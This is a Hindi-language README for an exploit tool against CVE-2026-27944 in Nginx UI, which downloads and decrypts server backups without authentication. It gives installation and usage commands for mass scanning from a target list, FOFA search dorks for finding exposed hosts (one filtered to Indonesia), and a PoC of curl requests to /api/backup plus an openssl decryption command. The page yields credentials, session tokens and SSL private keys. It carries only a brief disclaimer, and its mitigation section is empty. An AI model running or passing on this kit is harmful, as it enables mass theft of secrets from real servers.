
सुका सुका लाह
🚀 CVE-2026-27944: Nginx UI अप्रमाणित बैकअप शोषण
📌 विवरण
27944.py CVE-2026-27944 के लिए एक शोषण उपकरण है जो हमलावर को प्रमाणीकरण के बिना Nginx UI बैकअप डाउनलोड और डिक्रिप्ट करने की अनुमति देता है।
यह भेद्यता Nginx UI संस्करण < 2.3.2 में मौजूद है और इस तक पहुँच की अनुमति देती है:
· उपयोगकर्ता प्रमाण-पत्र और सत्र टोकन · SSL निजी कुंजियाँ · Nginx कॉन्फ़िगरेशन · डेटाबेस फ़ाइलें
🔧 विशेषताएँ
· ✅ लक्ष्य फ़ाइल से सामूहिक स्कैनिंग · ✅ एकल लक्ष्य शोषण · ✅ स्वचालित बैकअप डाउनलोड · ✅ स्वचालित AES-256-CBC डिक्रिप्ट · ✅ बैकअप से स्वचालित क्रेडेंशियल निकालें
🛠️ स्थापना विधि
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt
🚀 उपयोग विधि
python 27944.py -f targets.txt -o hasil_scan
python 27944.py -t target.com:9000 --exploit --decrypt
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full
📋 लक्ष्य प्रारूप
target1.com:9000
192.168.1.1:9000
target2.com:8080
🎯 FOFA डॉर्क
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"
📂 परिणाम आउटपुट
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
├── app.ini
├── database.db
├── nginx.conf
└── ssl/
⚠️ अस्वीकरण
यह उपकरण शैक्षिक उद्देश्यों और नैतिक सुरक्षा परीक्षण के लिए बनाया गया है। लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति है।
📝 तकनीकी व्याख्या
CVE-2026-27944 Nginx UI में एक गंभीर भेद्यता है जो हमलावर को प्रमाणीकरण के बिना /api/backup एंडपॉइंट तक पहुँचने की अनुमति देती है। बैकअप में AES-256 से एन्क्रिप्टेड संवेदनशील डेटा होता है, लेकिन कुंजी और IV X-Backup-Security हेडर के माध्यम से Base64 प्रारूप में भेजे जाते हैं।
CVSS स्कोर: 9.8 (गंभीर)
प्रभावित संस्करण: Nginx UI < 2.3.2
शमन:
💀 POC
# Check vulnerability
curl -I http://target:9000/api/backup
# Download backup
curl -s http://target:9000/api/backup -o backup.bin
# Decrypt backup (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip